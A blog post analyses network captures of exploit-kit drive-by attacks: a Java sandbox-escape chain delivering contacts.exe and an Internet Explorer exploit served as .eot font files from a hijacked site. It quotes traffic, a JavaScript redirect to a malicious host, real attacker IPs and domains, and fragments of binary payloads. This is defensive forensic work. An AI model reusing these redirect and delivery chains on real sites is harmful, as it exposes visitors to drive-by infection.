Detailed Analysis of the processes and stages of an Exploit Kit – Java and IE exploited by Flashpack Web Based Kit

By | August 9, 2015

Here you can see the webpage that the hackers exploited (arksylhet.com/A67iD4eo/index.html) and inserted within that page an iframe which includes a link to a Javascript Redirect file

 
2012-09-18 22:41:42.001035 IP 192.168.106.131.1411 > 92.43.108.70.80: Flags [P.], seq 1:395, ack 1, win 64240, length 394
E…*.@…….j.\+lF…P7_Z.X.X.P….?..GET /Lk1SsGQm/js.js HTTP/1.1
Host: web63.server77.publicompserver.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://arksylhet[.]com/A67iD4eo/index.html

2012-09-18 22:41:42.119368 IP 92.43.108.70.80 > 192.168.106.131.1411: Flags [P.], seq 1:473, ack 396, win 64239, length 472
E…_…….\+lF..j..P..X.X.7_\|P…D…HTTP/1.1 200 OK
Date: Wed, 19 Sep 2012 02:41:54 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Wed, 19 Sep 2012 02:31:59 GMT
ETag: “894002-47-4ca04cfa1a5c0″
Accept-Ranges: bytes
Content-Length: 71
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

document.location=’http://69.194.193.34/links/systems-links_warns.php’;   <—  The Javascript file simple contains a document.location variable that redirects the user to the landing page of the exploit kit

Redirection to the landing page, note that the referer below is the same link the Javascript had coded in it

2012-09-18 22:41:43.962836 IP 192.168.106.131.1414 > 69.194.193.34.80: Flags [P.], seq 1:540, ack 1, win 64240, length 539
E..C*@@….d..j.E..”…P.=1.v…P…J:..GET /links/systems-links_warns.php?ljpcwedu=0206360203&unnioab=41&phjf=35353306040934370b06&jct=0b0006000200030b07 HTTP/1.1
Host: 69.194.193.34
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://69.194.193.34/links/systems-links_warns.php
The victim is instructed to request the file “java.jar” which is a Java archive file containing the exploit for the vulnerable version of Java (1.7.0_06)
2012-09-18 22:41:47.553965 IP 192.168.106.131.1415 > 69.194.193.34.80: Flags [P.], seq 1:274, ack 1, win 64240, length 273
E..9*a@….M..j.E..”…P.?.GA.*.P…….GET /data/java.jar HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive <— MIME TYPE
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_06  <— Vulnerable version of Java
Host: 69.194.193.34
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
2012-09-18 22:41:48.092307 IP 69.194.193.34.80 > 192.168.106.131.1415: Flags [P.], seq 1:234, ack 274, win 64240, length 233
E…`#……E..”..j..P..A.*..?.XP…;3..HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 19 Sep 2012 02:42:01 GMT
Content-Type: application/java-archive
Connection: keep-alive
Content-Length: 33010
Last-Modified: Tue, 18 Sep 2012 07:17:22 GMT
Accept-Ranges: bytes

 

So, at this point the victim has been redirected to the exploit kit site and an exploit has been delivered, how do we know the exploit kit did its job?

Below is the proof in the pudding, this is the request for a malicious executable file, we know that because there is no longer a referer in the GET request, the User-Agent will still be for Java and lastly the “accept-encoding: pack200-gzip, gzip” will not be in the request for the malicious file. 

2012-09-18 22:41:51.821007 IP 192.168.106.131.1416 > 69.194.193.34.80: Flags [P.], seq 1:264, ack 1, win 64240, length 263
E../*w@….A..j.E..”…P.<..`dv.P…a…GET /links/systems-links_warns.php?vf=0206360203&we=35353306040934370b06&r=02&pj=w&gc=r HTTP/1.1   <—- Pointer on the exploit kit server to an executable file (the GET request does not have to have .exe or .zip or anything of the sorts in it for it to be an executable request, it simply points to a location on the server.

User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_06

Host: 69.194.193.34

Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2

Connection: keep-alive

 

To confirm, we look at the servers response to the clients request:

 

2012-09-18 22:41:52.369258 IP 69.194.193.34.80 > 192.168.106.131.1416: Flags [P.], seq 1:1461, ack 264, win 64240, length 1460
E…`s……E..”..j..P..`dv..<..P…….HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 19 Sep 2012 02:42:05 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
Content-Length: 131584
X-Powered-By: PHP/5.3.14-1~dotdeb.0
Pragma: public
Expires: Wed, 19 Sep 2012 02:42:04 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename=”contacts.exe”     <—– There it is, the GET request resulted in the download of a file named “contacts.exe”
Content-Transfer-Encoding: binary

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..

 

To summarize, at this point the exploit kit was able to successfully exploit the victims machine because it was able to make it download a file without the users consent by exploiting a vulnerability in Java that allowed a break out from the sandbox and onto the victims machine. This does not mean that the victim was infected by the file or that any malware is present on the machine. Anti-virus could have easily stopped it or another host based prevention system. The file may not have even been able to install properly.

 
Flashpack Web Based Exploit Kit Exploits an Internet Explorer vulnerability 

In this scenario, the victim is using Google Translate service to view a website, the website “hitcric.info” is a legitimate website hosting live Cricket (the sport) games that has been hacked. 

 

2014-05-18 22:27:26.841394 IP 192.168.204.222.49381 > 89.46.102.34.80: Flags [P.], seq 1:430, ack 1, win 64240, length 429
E…..@….,….Y.f”…P@HD.3.:[P….k..GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://translate.google[.]com/translate_c?depth=1&hl=en&langpair=en%7Cen&rurl=translate.google[.]com&sandbox=0&u=http://hitcric[.]info/&usg=ALkJrhiGLwR0ZHj_UP5Ja9lbM5QmnYvMQg
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: hitcric[.]info
Connection: Keep-Alive

2014-05-18 22:27:27.030069 IP 89.46.102.34.80 > 192.168.204.222.49381: Flags [FP.], seq 1:520, ack 430, win 64240, length 519
E../…….BY.f”…..P..3.:[@HF.P…,]..HTTP/1.1 302 Moved Temporarily   <—- The hackers have taken over the domain name and forwarded it to a web-based exploit kit, note the “Location:” pointer 
Server: nginx admin
Date: Mon, 19 May 2014 02:13:42 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: http://ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com/index.php?   s=dmpuc3Nwcz1mZGlzcWJhc20mdGltZT0xNDA1MTkwMjE3OTkxMDM3NTA4JnNyYz0yOTkmc3VybD1oaXRjcmljLmluZm8mc3BvcnQ9ODAma2V5PUU0NDZEMzA2JnN1cmk9Lw==

 

The victim has now hit what is known as the “landing page”

 

2014-05-18 22:27:28.423985 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [P.], seq 1:606, ack 1, win 64240, length 605
E….’@………_..Z…P’.=.n.~cP…….GET /index.php?s=dmpuc3Nwcz1mZGlzcWJhc20mdGltZT0xNDA1MTkwMjE3OTkxMDM3NTA4JnNyYz0yOTkmc3VybD1oaXRjcmljLmluZm8mc3BvcnQ9ODAma2V5PUU0NDZEMzA2JnN1cmk9Lw== HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://translate.google[.]com/translate_c?depth=1&hl=en&langpair=en%7Cen&rurl=translate.google[.]com&sandbox=0&u=http://hitcric[.]info/&usg=ALkJrhiGLwR0ZHj_UP5Ja9lbM5QmnYvMQg
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com

2014-05-18 22:27:28.906353 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [P.], seq 1:879, ack 606, win 64240, length 878
E………c2_..Z…..P..n.~c’.@.P…e…HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:01 +0000
Content-Encoding: gzip
Vary: Accept-Encoding
PASSES BROWSER INFORMATION BACK TO EXPLOIT KIT BELOW WITH THE GET REQUEST FOR “json.php”

2014-05-18 22:27:46.874353 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [P.], seq 1806:2505, ack 47970, win 62795, length 699
E….A@….W…._..Z…P’.D.n.9.P..K.4..POST /tresting/avalonr/json.php HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com/tresting/avalonr/allow.php
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Content-Length: 207
Connection: Keep-Alive
Cache-Control: no-cache

id=306a617661646273696c766572666c323031346d736965387c6c6579396e6275396334633572336f69653338313969743532393935336331383035333632663931613264313662366430373166643562302e6e73312e626179616e646f766d6563692e636f6d
2014-05-18 22:27:46.874411 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [.], ack 2505, win 64240, length 0
E..(……fk_..Z…..P..n.9.’.G.P….d……..
2014-05-18 22:27:47.692844 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [P.], seq 47970:48554, ack 2505, win 64240, length 584
E..p……d”_..Z…..P..n.9.’.G.P…L…HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Sends the Internet Explorer exploit in a font file .eot which is in a binary file format, note the large content length

2014-05-18 22:27:48.285586 IP 192.168.204.222.49388 > 95.154.246.90.80: Flags [P.], seq 401:686, ack 972, win 63269, length 285
E..E.[@………_..Z…PcS%&g^w6P..%….GET /tresting/avalonr/include/add8dc99221ed3fa474c85b43f3262ed.eot HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Connection: Keep-Alive
2014-05-18 22:27:48.599716 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [P.], seq 972:2240, ack 686, win 64240, length 1268
E………aH_..Z…..P..g^w6cS&CP….c..HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:48 GMT
Content-Type: application/octet-stream   <—- MIME type for a binary file
Content-Length: 22319

 

First exploit appears to have failed, here is another exploit attempt with a different exploit for Internet Explorer:
2014-05-18 22:27:52.038864 IP 192.168.204.222.49388 > 95.154.246.90.80: Flags [P.], seq 686:842, ack 23546, win 64240, length 156
E….d@….S…._..Z…PcS&Cg^.dP…….GET /tresting/avalonr/include/1f55ea0e76576767cbd3d4e266e5dacf.eot HTTP/1.1
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Cache-Control: no-cache

2014-05-18 22:27:52.038923 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [.], ack 842, win 64240, length 0
E..(.+….f(_..Z…..P..g^.dcS&.P…O5……..
2014-05-18 22:27:52.327008 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [P.], seq 23546:24814, ack 842, win 64240, length 1268
E….,….a3_..Z…..P..g^.dcS&.P…….HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:52 GMT
Content-Type: application/octet-stream
Content-Length: 13312
Connection: keep-alive
Last-Modified: Mon, 19 May 2014 02:25:29 GMT
ETag: “53796b99-3400″
Accept-Ranges: bytes

tc.9:999=999..99.9999999y99999999999999999999999999999999999.9997&.79.0…8u..mQPJ.IKV^KXT.ZXWWVM.[\.KLW.PW.}vj.TV]\.443.9999999..1…_C.._C.._C..^C.._C…C.._C…C.._C…C.._C…C.._C..?C.._C…C.._CkPZQ.._C9999999999999999i|99u8=9..;q99999999.97.28>39.9991999999 +999)999y9999P`9)999;99<989<989=99999999I999=99..99:99=99=99)9999)99)999999)999i.99V999a.99A9999i999=9999999999999999999Y99E899.)99%99999999999999999999999999999999999A;99.9999)99.999999999999999999999999999.M\AM999..999)999.999=99999999999999.99Y.]XMX999)9999y999;999.99999999999999y99..KJKZ9999=999i999=999.99999999999999y99y.K\UVZ99.8999Y999;999.99999999999999y99{..;q.999..;qz999..;qi989..;qd999″.;q^999(.;qK99999999999TJOZKM.]UU9x}oxip ..]UU9r|kw|u ..]UU9wm}uu.}uu9lj|k ..]UU9jq|uu ..]UU9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999

 

BOOM……this exploit has succeeded, the GET request for “loadsilver.php” is actually a pointer to a place on the exploit kit server for the file “e53796b9e8cb041400466334.exe” and as you can see below, another successful exploitation. Note: There is no discussion of malware here because there is no “callback” and in this example the executable fails to install properly as anti-virus quarantined the executable upon download (not that you could see that from network traffic).
2014-05-18 22:27:53.049638 IP 192.168.204.222.49391 > 95.154.246.90.80: Flags [P.], seq 1:343, ack 1, win 64240, length 342
E..~.u@………_..Z…P@)g.)m..P…=l..GET /tresting/avalonr/loadsilver.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Connection: Keep-Alive

2014-05-18 22:27:53.049647 IP 95.154.246.90.80 > 192.168.204.222.49391: Flags [.], ack 343, win 64240, length 0
E..(.?….f._..Z…..P..)m..@)i!P…0………
2014-05-18 22:27:53.257927 IP 95.154.246.90.80 > 192.168.204.222.49391: Flags [P.], seq 1:1269, ack 343, win 64240, length 1268
E….@….a._..Z…..P..)m..@)i!P….L..HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:53 GMT
Content-Type: application/octet-stream
Content-Length: 94514
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Accept-Ranges: bytes
Content-Disposition: inline; filename=e53796b9e8cb041400466334.exe

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..

Share Button

2 thoughts on “Detailed Analysis of the processes and stages of an Exploit Kit – Java and IE exploited by Flashpack Web Based Kit

  1. cpak

    Awesome write up. You should follow up with additional traffic from an infected host.

    Reply
  2. Pingback: click here link click click this link good site here is the site http://www.clemsondeckbuilders.com/ www.clemsondeckbuilders.com/ clemsondeckbuilders.com/ http://www.clemsondeckbuilders.com/ www.clemsondeckbuilders.com/ clemsondeckbuilders.com/ http://www

Leave a Reply

Your email address will not be published. Required fields are marked *